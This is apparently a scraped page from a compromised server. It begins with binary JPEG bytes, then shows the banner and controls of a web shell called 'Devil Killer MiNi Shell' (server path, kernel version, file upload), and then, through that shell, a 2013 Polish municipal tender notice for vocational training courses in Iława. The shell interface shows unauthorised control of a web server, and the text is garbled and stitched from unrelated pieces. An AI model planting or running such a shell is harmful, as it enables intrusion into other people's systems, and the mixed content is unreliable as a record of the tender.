JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131023/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131023/221757-N-2013.html

<p class="kh_header"><b>Iława: Organizacja i przeprowadzenie usług  szkoleń zawodowych dla uczestniczek i uczestników projektu pn. Aktywna integracja szansą na lepsze jutro w roku 2013. Znak postępowania: GOSP.3410/6/2013</b><br>
<b>Numer ogłoszenia: 221757 - 2013; data zamieszczenia: 23.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Gen. Wł. Andersa 2 A, 14-200 Iława, woj. warmińsko-mazurskie, tel. 89 649 08 18, faks 89 649 08 16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gops.ilawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie usług  szkoleń zawodowych dla uczestniczek i uczestników projektu pn. Aktywna integracja szansą na lepsze jutro w roku 2013. Znak postępowania: GOSP.3410/6/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest  Organizacja i przeprowadzenie usług  szkoleń zawodowych dla uczestniczek i uczestników projektu pn. Aktywna integracja szansą na lepsze jutro w roku 2013 
2.	Przedmiot zamówienia obejmuje został podzielony na 3 części zamówienia, z których każda stanowi odrębną część i może być przedmiotem oferty częściowej: 
1)	Część 1 Szkolenie zawodowe w zakresie  Pomocnik kucharza:
a)	Przeprowadzenie szkolenia zawodowego w zakresie pomocnik kucharza dla 15 osób w  ilości minimum 120 godz., 
w tym 30 godz. zajęć teoretycznych i 90 godz. zajęć praktycznych z podejściem do egzaminu wewnętrznego;
b)	Okres realizacji: od dnia podpisania umowy do dnia 24.12.2013 r.
2)	Część 2 -  Szkolenie zawodowe w zakresie Nowoczesny sprzedawca: 
a)	Przeprowadzenie szkolenia zawodowego w zakresie Nowoczesny sprzedawca dla 12 osób w Ilości minimum 80 godz., w tym 40 godz. zajęć teoretycznych i 40 godz. zajęć praktycznych zakończonych egzaminem wewnętrzny;
b)	Okres realizacji: od dnia podpisania umowy do dnia 24.12.2013 r.
3)	Część 3 -  szkolenie zawodowe w zakresie kursu prawa jazdy kat. B, które obejmuje
a)	Przeprowadzenie szkolenia zawodowego z zakresu kursu prawa jazdy kat. B z podejściem do egzaminu wewnętrznego a następnie do pierwszego egzaminu państwowego teoretycznego i praktycznego dla 10 osób w Ilości 60 godz. 
w tym: 30 godzin zajęć teoretycznych i 30 godzin zajęć praktycznych.
b)	Okres realizacji: od dnia podpisania umowy do dnia 24.12.2013 r.
c)	Szkolenie powinno być zrealizowane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. 
 sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów 
i egzaminatorów (Dz. U. Nr 217poz. 1834 z późn. zm.).
d)	Przeprowadzenie szkolenia zawodowego z zakresu kursu prawa jazdy kat. B z podejściem do egzaminu wewnętrznego, a następnie do pierwszego egzaminu państwowego teoretycznego i praktycznego. 

3.	Przez godzinę zamawiający rozumie: 1 godz= 45min - dla zajęć teoretycznych oraz 1 godz.= 60 min dla nauki praktycznej.
4.	Szczegółowy opis przedmiotu zamówienia (każdej części ) zawarty jest w załączniku nr 1 do wzoru umowy (§XXVII SIWZ).
5.	Każdy wykonawca może złożyć ofertę na całość zamówienia lub na dowolnie wybraną jego część lub części. Wówczas do oferty wykonawca załącz te formularze ofertowe dotyczące danej części na które składa ofertę.
6.	W pozycjach formularza ofertowego, na które wykonawca nie składa oferty wpisuje nie dotyczy.
7.	Nazwy kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień CPV 80500000-9 - usługi szkoleniowe, 80530000-8 usługi szkoleń zawodowych, 80411200-0 - usługi szkół nauki jazdy.
8.	Zgodnie z art. 36 ust.4 ustawy Pzp Wykonawca zobowiązany jest przedstawić w ofercie część zamówienia, której wykonanie powierzy podwykonawcom wypełniając wzór nr 4 - jeżeli wykonawca przewiduje udział podwykonawców. 
9.	Zadanie jest współfinansowane z Programu Operacyjnego Kapitał Ludzki ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Priorytet VII - Promocja integracji społecznej Działanie 7.1. - Rozwój  i upowszechnianie aktywnej integracji Poddziałanie 7.1.1 - Rozwój u upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. Nazwa Projektu Aktywna integracja szansą na lepsze jutro.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.41.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zgodnie z art. 45 ust.2 ustawy Pzp zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Wykonawca składa oświadczenie o spełnieniu warunku zgodnie z wzorem nr 2, o którym mowa w §VII ust.1 pkt 2). Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku  posiadania wiedzy i doświadczenia, wykonawca składa oświadczenie o spełnieniu warunku zgodnie z wzorem nr 2, o którym mowa w §VII ust.1 pkt.2) SIWZ, że posiada wiedzę i doświadczenie do wykonania zamówienia. Ocena spełniania warunku nastąpi na podstawie załączonego do oferty oświadczenia wymienionego w § VII ust.1 pkt.2) SIWZ. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla uznania, że wykonawca spełnia warunek posiadania do dyspozycji potencjału technicznego zamawiający żąda, by wykonawca złożył oświadczenie o spełnieniu warunku zgodnie z wzorem nr 2, o którym mowa w §VII ust.1 pkt.2) SIWZ, że dysponuje potencjałem technicznym potrzebnym do wykonania zamówienia. Ocena spełniania warunku nastąpi na podstawie załączonego do oferty oświadczenia wymienionego w § VII ust.1 pkt.2) SIWZ. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, zamawiający żąda, by wykonawca wykazał, co najmniej następujące osoby:
1.	 Dla części 1
a)	min. jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia i która posiada minimum:
-	wykształcenie wyższe lub średnie kierunkowe w zakresie zawodu kucharza lub zawodowe wraz dyplomem mistrza kucharza potwierdzający kwalifikacje.
-	doświadczenie w prowadzeniu szkoleń zakresie zawodu kucharza lub pomocnika kucharza - (min. 1 szkolenie w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia),
-	doświadczenie zawodowe -  minimum 5 lat
-	uprawnienia pedagogiczne
2.	Dla części 2:
a)	min. jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia i która posiada minimum:
-	wykształcenie wyższe lub średnie ekonomiczne lub handlowe lub marketing i zarządzanie. 
-	doświadczenie w prowadzeniu szkoleń zakresie zawodu sprzedawca z obsługą kas fiskalnych - (min. 1 szkolenie w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia)
-	uprawnienia pedagogiczne
-	doświadczenie zawodowe -  minimum 5 lat. 
3.	 Dla części 3: 
a)	min. jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia i która posiada minimum:
-	Wykształcenie wyższe lub średnie: 
-	Licencja instruktora nauki jazdy umożliwiająca prowadzenie zajęć praktycznych i teoretycznych
oraz złoży oświadczenie o spełnieniu warunku zgodnie z wzorem nr 2, o którym mowa w §VII ust.1 pkt.2) SIWZ, że dysponuje osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunku nastąpi na podstawie wypełnionego przez Wykonawcę wzoru nr 4 do SIWZ, o którym mowa w § VII ust. 1 pkt. 6). Nie wykazanie w wystarczający sposób potwierdzania spełniania tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów. Zamawiający dopuszcza realizację przez jedną osobę poszczególnych części pod warunkiem posiadania wymaganych kwalifikacji i doświadczenia dla poszczególnych części. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunek</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia dla uznania, że wykonawca spełnia warunek zamawiający żąda, by wykonawca złożył oświadczenie o spełnieniu warunku zgodnie z wzorem nr 2, o którym mowa w §VII ust.1 pkt.2) SIWZ, że znajduje się sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia. Ocena spełniania warunku nastąpi na podstawie załączonego do oferty oświadczenia wymienionego w § VII ust.1 pkt.2) SIWZ. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony formularz ofertowy (wg wzoru nr 1), 
2)	Części zamówienia powierzone podwykonawcom- wg wzoru 4 -wykonawca składa to oświadczenie, jeżeli wykonawca przewiduje udział podwykonawców.
3)	Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona
 4) Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - nie wydaje się dokumentów, o których mowa w sekcji III.4.3.1) niniejszego ogłoszenia ( § VII ust. 1 pkt. 4) SIWZ) zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem, z zachowaniem terminów ich wystawienia, o których mowa w sekcji III.4.3.1) niniejszego ogłoszenia ( § VII ust. 1 pkt. 4) SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w§8 wzoru umowy stanowiącego załącznik do SIWZ, którego treść jest następująca:
§ 8.	Zmiana umowy
1.	Zmiana postanowień niniejszej umowy może nastąpić za zgodą obydwu stron wyrażoną na piśmie, w formie aneksu do umowy 
z zachowaniem formy pisemnej pod rygorem nieważności takiej zmiany.
2.	Zamawiający działając w oparciu o art. 144 ust 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku do treści złożonej oferty:
1)	wystąpienia okoliczności, których nie można było przewidzieć pomimo zachowania należytej staranności.
2)	zmiany terminu realizacji umowy w przypadku zawieszenia realizacji przedmiotu zamówienia przez zamawiającego, 
3)	zmiany terminu realizacji umowy w przypadku wystąpienia przestojów i opóźnień zawinionych przez Zamawiającego,
4)	zamiany terminu realizacji umowy w przypadku działania siły wyższej (np. klęski żywiołowe, strajki), mającej bezpośredni wpływ na terminowość wykonania przedmiotu umowy.
5)	zmiany terminu na skutek działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji przedmiotu umowy. 
6)	w przypadku urzędowej zmiany stawki VAT strony zobowiązują się do zawarcia aneksu do umowy regulującego wysokość VAT, tym samym zmiany wynagrodzenia określonego w §3 ust.2 niniejszej umowy. Koszty związane ze wzrostem stawki VAT pokrywa wykonawca.
7)	wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy.
8)	zmniejszenia liczby osób i kosztu szkolenia w przypadku rezygnacji uczestników szkolenia w trakcie trwania szkolenia wówczas wykonawca otrzyma wynagrodzenie w wysokości adekwatnej do ilości godzin, w których uczestniczyła osoba rezygnująca ze szkolenia obliczoną w następujący sposób cena jednostkowa za przeszkolenie osoby zostanie podzielona przez ilość godzin szkolenia, a uzyskana cena za 1 godzinę zostanie pomożona przez ilość godzin , w których uczestniczyła osoba rezygnująca ze szkolenia 
9)	zmniejszenia liczby osób i kosztu szkolenia w przypadku rezygnacji uczestników szkolenia przed przystąpieniem do szkolenia , wówczas wykonawca otrzyma wynagrodzenie tylko za przeszkolone osoby
10)	zmiany osób odpowiedzialnych za realizację przedmiotu umowy. Zmiana którejkolwiek z osób w trakcie realizacji przedmiotu niniejszej umowy, musi być uzasadniona przez Wykonawcę na piśmie i wymaga pisemnego zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje taką zmianę w terminie 7 dni od daty przedłożenia propozycji i wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji i doświadczenia osób wymaganego postanowieniami specyfikacji istotnych warunków zamówienia.
11)	Wystąpienia konieczności zmian osób wykonawcy w przypadku, gdy zamawiający uzna, że osoby te nie wykonują należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych osób na inne spełniające na dzień składania ofert warunki określone w specyfikacji w terminie nie dłuższym niż 14 dni od daty złożenia wniosku przez zamawiającego.
12)	Wykonawca musi przedłożyć Zamawiającemu propozycję zmiany, o której mowa w pkt.11 nie później niż 2 dni przed planowanym skierowaniem do realizacji zamówienia którejkolwiek osoby. Jakakolwiek przerwa w realizacji przedmiotu umowy wynikająca z braku osób prowadzących szkolenie traktowana jako przerwa wynikła z przyczyn zależnych od Wykonawcy i nie może stanowić podstawy do zmiany terminu realizacji przedmiotu zamówienia.
13)	Zmiany podwykonawców, pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca
14)	Zmiany miejsca szkolenia, w przypadku, gdy Wykonawca zaproponuje lepsze warunki lokalowe wymienione w ofercie, w przypadku awarii Sali szkoleniowej lub budynku uniemożliwiającej przeprowadzenie zajęć lub, kiedy umowa miedzy Wykonawcą a właścicielem Sali przeznaczonej na szkolenie zostanie rozwiązana z przyczyn nieleżących po stronie wykonawcy. 
15)	Zmiany harmonogramu przeprowadzonych zajęć, w przypadku, kiedy wykładowca przewidziany do realizacji danego modułu ze względów zdrowotnych lub zawodowych nie może przeprowadzić zajęć w danym terminie lub gdy wynika zmiany po stronie Zamawiającego w wyniku niezorganizowania grupy uczestników i uczestniczek szkoleń
3.	W przypadkach wystąpienia okoliczności określonych w ust.1 pkt.1)-5) strony ustalą nowe terminy realizacji, z tym, że minimalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub postoju</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gops.ilawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Iławie, ul. Gen Andersa 2a, 14-200 Iława, pok 222.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2013 godzina 08:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Iławie, ul. Gen Andersa 2a, 14-200 Iława pok.222.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Zadanie jest współfinansowane z Programu Operacyjnego Kapitał Ludzki ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Priorytet VII - Promocja integracji społecznej Działanie 7.1. - Rozwój  i upowszechnianie aktywnej integracji Poddziałanie 7.1.1 - Rozwój u upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. Nazwa Projektu Aktywna integracja szansą na lepsze jutro.
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiać w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Wyżej wymienione pisemne zobowiązania innych podmiotów należy do oferty załączyć w oryginale. Z treści powyższego dokumentu (zobowiązania podmiotu trzeciego), musi jasno wynikać: 
1)	kto jest podmiotem przyjmującym zasoby, 
2)	jaki jest zakres dostępnych wykonawcy zasobów innego podmiotu
3)	w jaki sposób zostaną wykorzystane zasoby innego podmiotu przez wykonawcę, przy wykonywaniu zamówienia,
4)	jakiego charakteru stosunki będą łączyły wykonawcę z innym podmiotem, 
5)	jaki jest zakres i w jakim okresie inny podmiot  będzie brał udział przy wykonywaniu zamówienia
3. Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać wskazanie postępowania o zamówienie publiczne, którego dotyczy, wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania. Podpisany przez wszystkich wykonawców ubiegających się wspólnie o zamówienie publiczne. Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze. Dokument pełnomocnika należy przedstawić w formie oryginału lub kopii poświadczonej notarialnie . Wszelka korespondencja będzie prowadzona wyłącznie z podmiotem występującym jako pełnomocnik..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenie zawodowe w zakresie - Pomocnik kucharza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Część 1 Szkolenie zawodowe w zakresie  Pomocnik kucharza:
